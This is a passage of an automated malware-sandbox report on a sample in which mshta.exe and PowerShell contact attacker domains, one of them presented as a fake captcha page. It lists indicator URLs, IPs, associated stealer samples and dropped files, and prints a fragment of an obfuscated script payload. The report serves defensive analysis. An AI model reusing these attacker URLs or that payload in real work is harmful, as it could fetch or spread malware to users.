                                              https://atsukaa.thrivezest.org/winwidgetshp.json.mshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://atsukaa.thrivezest.org/winwidgetshp.jsonetCookiesxmshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://crl.microsoftpowershell.exe, 00000006.00000002.2683246502.0000000003561000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.2688123535.00000000063DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://atsukaa.thrivezest.org/winwidgetshp.jsonhttps://atsukaa.thrivezest.org/winwidgetshp.jsonhttpmshta.exe, 00000002.00000003.1778635657.0000000009484000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://crl.microXzpowershell.exe, 00000006.00000002.2722957905.0000000007AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://atsukaa.thrivezest.org/mshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://github.com/mgravell/protobuf-netipowershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1756039105.0000000004E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2688123535.0000000005371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/powershell.exe, 00000006.00000002.2688123535.00000000063DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1759303262.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2688123535.00000000063DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://atsuka.thripowershell.exe, 00000004.00000002.1756039105.00000000050A5000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        		unknown
                                                                        https://atsukaa.thrivezest.org/winwidgetshp.jsontmshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1756039105.0000000004E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2688123535.0000000005371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://atsukaa.thrivezest.org/winwidgetshp.jsonzmshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://solve.fizq.net/awjxs.captchaDmGmshta.exe, 00000002.00000002.1780100750.0000000000670000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://atsukaMicrosoft.PowerShell.Utility.psd1powershell.exe, 00000004.00000002.1752567349.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://atsukaa.thrivezest.org/winwidgetshp.jsonfmshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1759303262.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2688123535.00000000063DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://atsukaa.thrivezest.org/winwidgetshp.jsonhttps://atsukaa.thrivezest.org/winwidgetshp.jsonmshta.exe, 00000002.00000003.1778635657.0000000009475000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://stackoverflow.com/q/14436606/23354powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://solve.fizq.net/awjxs.captcha&mshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2688123535.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://solve.fizq.net/awjxs.captcha0mshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2688123535.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://go.micropowershell.exe, 00000004.00000002.1756039105.000000000577C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://atsukaa.thrivezest.org/Amshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://solve.fizq.net/awjxs.captcha1mshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://atsukaa.thrivezest.org/winwidgetshp.jsonstoryHistory.IE5xmshta.exe, 00000002.00000003.1777514381.000000000282C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780491808.000000000282C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://solve.fizq.net/awjxs.captcha...mshta.exe, 00000002.00000002.1780566253.0000000002851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769853728.0000000002851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://atsukaa.thrivezest.org/winwidgetshp.json...mshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769853728.0000000002851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://atsukaa.thrivezest.org/=mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://contoso.com/Iconpowershell.exe, 00000006.00000002.2688123535.00000000063DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://solve.fizq.net/awjxs.captchaWinSta0mshta.exe, 00000002.00000002.1780385458.00000000027D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780177793.0000000000680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://github.com/mgravell/protobuf-netpowershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://atsukaa.thrivezest.org/winwidgetshp.jsoneval(GbaEXk.replace(/(..)./gmshta.exe, 00000002.00000003.1778635657.0000000009484000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://atsukaa.thrivezest.org/5mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2688123535.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://atsukaa.thrivezest.org/winwidgetshp.jsonnC:mshta.exe, 00000002.00000003.1778044565.000000000286D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769853728.000000000286D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780645994.000000000286D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://solve.fizq.net/awjxs.captchaPmshta.exe, 00000002.00000003.1777514381.000000000282C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780491808.000000000282C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://solve.fizq.net/mshta.exe, 00000002.00000003.1777514381.000000000282C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780491808.000000000282C000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                  		unknown
                                                                                                                                  https://stackoverflow.com/q/2152978/23354powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://atsuka.thrivezest.orgpowershell.exe, 00000006.00000002.2688123535.00000000054C8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                      		unknown
                                                                                                                                      https://atsukaa.thrivezest.org/winwidgetshp.json...#mshta.exe, 00000002.00000002.1780566253.0000000002851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://atsukaa.thrivezest.org/winwidgetshp.json..zmshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          104.21.18.182
                                                                                                                                          		atsukaa.thrivezest.orgUnited States
                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                          172.67.131.114
                                                                                                                                          		solve.fizq.netUnited States
                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                          172.67.183.27
                                                                                                                                          		atsuka.thrivezest.orgUnited States
                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                          172.67.151.193
                                                                                                                                          		locketplyxx.clickUnited States
                                                                                                                                          		13335CLOUDFLARENETUStrue

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1579343
                                                                                                                                          Start date and time:2024-12-21 20:12:38 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 7m 40s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:defaultwindowscmdlinecookbook.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:13
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.win@12/7@4/4
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 33.3%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 93%
                                                                                                                                          • Number of executed functions: 94
                                                                                                                                          • Number of non-executed functions: 33

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63
                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 7356 because there are no executed function
                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7572 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          14:13:37API Interceptor57x Sleep call for process: powershell.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          172.67.131.114987123.exeGet hashmaliciousLummaC, Eternity Stealer, LummaC Stealer, SmokeLoader, Stealc, zgRATBrowse

                                                                                                                                            Domains

                                                                                                                                            No context

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            CLOUDFLARENETUSLightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.26.9.59
                                                                                                                                            Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                            • 104.21.67.146
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                            • 104.21.67.146
                                                                                                                                            Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.16.1
                                                                                                                                            https://shibe-rium.net/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 104.18.18.237
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            finathot.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                            • 172.67.178.25
                                                                                                                                            Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            CLOUDFLARENETUSLightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.26.9.59
                                                                                                                                            Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                            • 104.21.67.146
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                            • 104.21.67.146
                                                                                                                                            Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.16.1
                                                                                                                                            https://shibe-rium.net/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 104.18.18.237
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            finathot.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                            • 172.67.178.25
                                                                                                                                            Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            CLOUDFLARENETUSLightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.26.9.59
                                                                                                                                            Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                            • 104.21.67.146
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                            • 104.21.67.146
                                                                                                                                            Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.16.1
                                                                                                                                            https://shibe-rium.net/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 104.18.18.237
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            finathot.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                            • 172.67.178.25
                                                                                                                                            Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            CLOUDFLARENETUSLightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.26.9.59
                                                                                                                                            Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                            • 104.21.67.146
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                            • 104.21.67.146
                                                                                                                                            Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.16.1
                                                                                                                                            https://shibe-rium.net/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 104.18.18.237
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            finathot.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                            • 172.67.178.25
                                                                                                                                            Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eRechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.183.27
                                                                                                                                            Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.183.27
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                            • 172.67.183.27
                                                                                                                                            Fatura227Pendente576.pdf674.msiGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.183.27
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                            • 172.67.183.27
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                            • 172.67.183.27
                                                                                                                                            B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.183.27
                                                                                                                                            B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.183.27
                                                                                                                                            2BI8rJKpBa.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                            • 172.67.183.27
                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.151.193
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                            • 172.67.151.193
                                                                                                                                            Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.151.193
                                                                                                                                            Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.151.193
                                                                                                                                            BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.151.193
                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.151.193
                                                                                                                                            Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.151.193
                                                                                                                                            jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.151.193
                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.151.193
                                                                                                                                            37f463bf4616ecd445d4a1937da06e19LightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.18.182
                                                                                                                                            • 172.67.131.114
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                            • 104.21.18.182
                                                                                                                                            • 172.67.131.114
                                                                                                                                            Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.18.182
                                                                                                                                            • 172.67.131.114
                                                                                                                                            Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.18.182
                                                                                                                                            • 172.67.131.114
                                                                                                                                            Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.18.182
                                                                                                                                            • 172.67.131.114
                                                                                                                                            BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.18.182
                                                                                                                                            • 172.67.131.114
                                                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.18.182
                                                                                                                                            • 172.67.131.114
                                                                                                                                            jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.18.182
                                                                                                                                            • 172.67.131.114
                                                                                                                                            Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.18.182
                                                                                                                                            • 172.67.131.114

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\winwidgetshp[1].json

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1446803
                                                                                                                                            Entropy (8bit):5.091788269559735
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:VAi+O4ORkSraefSeVeKz2/eeWFhenE2JbOIKHeIZw:VAAa
                                                                                                                                            MD5:700EDBF1E36CDBDC5B01BD20BD68ABF2
                                                                                                                                            SHA1:DC89EDC94F9DE4316BEE29EB5FFDA06E33F1FEA4
                                                                                                                                            SHA-256:8C4F272FED7CC1545EFF3805AA41E4806AC4FB9D24219E4DF7CEF27D7AF36B18
                                                                                                                                            SHA-512:1106894A9663143BADEFED2A49FB93BD4A5E4BFFC50ED531B1A262AD0E04E066985FDBCBF3B478D9DC22F2F45EFDC707C006AE0D0268CA5F300AC71BE18CFEB3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:66q75q6ed63v74E69E6fz6eB20L6bJ6cO68e42A44x28r75J72I49f51i48h63n29G7bI76u61A72C20k47d62I61A45h58j6bs3dT20k27O27t3bp66n6fB72f20d28V76E61g72N20H73T47P65T65Z67o4fk20g3dU20j30h3bj73v47B65U65V67s4fL20c3ce20l75h72M49c51P48T63s2eg6cC65K6el67D74N68m3bv20Q73O47p65a65s67y4fL2bz2bB29g7bK76u61m72h20J68l55J54c4fC49b20a3dG20n53D74G72w69E6ee67J2ex66e72V6fI6dF43D68H61C72k43j6ff64Z65h28L75w72F49Y51F48z63s5bZ73b47a65L65K67V4fK5da20l2dU20w34u30h32p29D3bB47o62l61g45e58C6bi20Z3ds20W47B62s61u45r58y6bh20q2bE20l68k55V54D4fK49x7dk72t65g74R75Q72n6ek20s47r62I61u45Q58m6bZ7dV3bq76r61C72i20o47I62c61P45j58m6bm20F3dp20v6bF6ch68x42e44o28v5bk35V31R34I2cF35m31J33A2cm35w32i31u2cQ35j30v33s2cS35V31W36o2cH35d31x37e2cd35h30u36w2cl35a30w33l2cy35d31k30U2cZ35t31c30C2cz34b34d38m2cE35s30p33G2cz35M32O32b2cI35z30n33H2cY34m33f34X2cr34M34O37L2cA35w32v31n2cz34a33T34Z2ct34U35p31f2cA34K33a34k2cs34o34x37Z2cL35U30d33y2cp35c31w34n2cO34E33K34m2cM34R38m37H2cw35B31G32Y2ct35p31i36o2cK35I30H33O2cM35u31f37C2cP35p31z38f2cT35w31x36W2ce35f30K37o2cJ3

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8003
                                                                                                                                            Entropy (8bit):4.840877972214509
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                                                            MD5:106D01F562D751E62B702803895E93E0
                                                                                                                                            SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                                                            SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                                                            SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
